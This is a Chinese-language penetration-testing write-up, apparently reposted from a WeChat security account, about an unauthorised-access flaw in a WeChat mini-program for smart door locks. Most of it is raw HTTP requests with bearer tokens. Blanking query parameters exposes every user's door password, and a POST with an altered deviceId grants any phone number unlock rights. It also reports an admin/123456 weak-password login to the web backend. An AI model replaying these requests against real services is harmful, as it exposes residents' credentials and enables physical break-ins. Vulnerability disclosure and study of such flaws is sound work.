原创说明
本篇文章为苏木师傅实战案例分享
渗透记录
微信小程序xxx,点击门卡-点击添加密码-截获数据包查看返回包可查看密码,可越权授权如何手机号开门权限
未授权一
删除userid和bind数值可查看全部用户密码 数据包:
GET/prod-api/nfc/device/list?userId=&isBind= HTTP/1.1Host:XXX.XXX.cnXweb_xhr:1Authorization:eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImUwMGY0YTY0LTNjZDctNDc1Zi1iN2NlLTc5ZDcwYWY3MjNjYyJ9.1LwhfaSNs34yL9mnACRLkviTL5NzbLCQwpv_jd0bjrsFcoFhMVsO7AD9C-K3jl83VA7RC5X_p53vCW4ZeWsqEQUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531Content-Type:application/jsonAccept:*/*Sec-Fetch-Site:cross-siteSec-Fetch-Mode:corsSec-Fetch-Dest:emptyReferer:https://servicewechat.com/wx473f7c96d0986720/37/page-frame.htmlAccept-Encoding:gzip, deflateAccept-Language:zh-CN,zh;q=0.9Connection:close
可查看自己的密码
删除deviceid、ismin、status值后可查看所有用户密码
数据包:
GET/prod-api/fy/cardkey/list?deviceId=&isMain=&status= HTTP/1.1Host:XXX.XXX.cnXweb_xhr:1Authorization:eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImUwMGY0YTY0LTNjZDctNDc1Zi1iN2NlLTc5ZDcwYWY3MjNjYyJ9.1LwhfaSNs34yL9mnACRLkviTL5NzbLCQwpv_jd0bjrsFcoFhMVsO7AD9C-K3jl83VA7RC5X_p53vCW4ZeWsqEQUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531Content-Type:application/jsonAccept:*/*Sec-Fetch-Site:cross-siteSec-Fetch-Mode:corsSec-Fetch-Dest:emptyReferer:https://servicewechat.com/wx473f7c96d0986720/37/page-frame.htmlAccept-Encoding:gzip, deflateAccept-Language:zh-CN,zh;q=0.9Connection:close
数据包:
POST /prod-api/fy/cardkey HTTP/1.1Host: xxx.xxx.cnContent-Length: 131Xweb_xhr: 1Authorization: eyJhbGciOiJIUzUxMiJ9.eyJsb2dpbl91c2VyX2tleSI6ImJiMDIxZjZmLTZmY2UtNDRmOS04M2FlLTBkZmMxZDEyZTZlNiJ9.ndIZOlqG9vXCvb2EBc5efx14tz3VtED_uRrFrCS-FhyBNY4MQTdu08ZVU6QfrrACGmuH_eZbr_uRfWBsEVXT6gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 MicroMessenger/7.0.20.1781(0x6700143B) NetType/WIFI MiniProgramEnv/Windows WindowsWechat/WMPF WindowsWechat(0x63090819) XWEB/8531Content-Type: application/jsonAccept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://servicewechat.com/wx473f7c96d0986720/37/page-frame.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close{"deviceId":"758","passType":"4","password":"978949","endData":0,"phone":"18888888888","startTime":"2024-01-19 09:00","endTime":""}
通过修改deviceId值可在任何账号中为指定手机授权开锁权限
小程序看完了,看看web,运气不错弱口令进去了是若依系统,但可惜的是里面没有历史漏洞
Url:https://XXX.XXX.cn/
账号:admin
密码:123456
本篇文章为苏木师傅实战案例分享
原文始发于微信公众号(梅苑安全学术):某微信小程序未授权漏洞挖掘(置空查询思路)
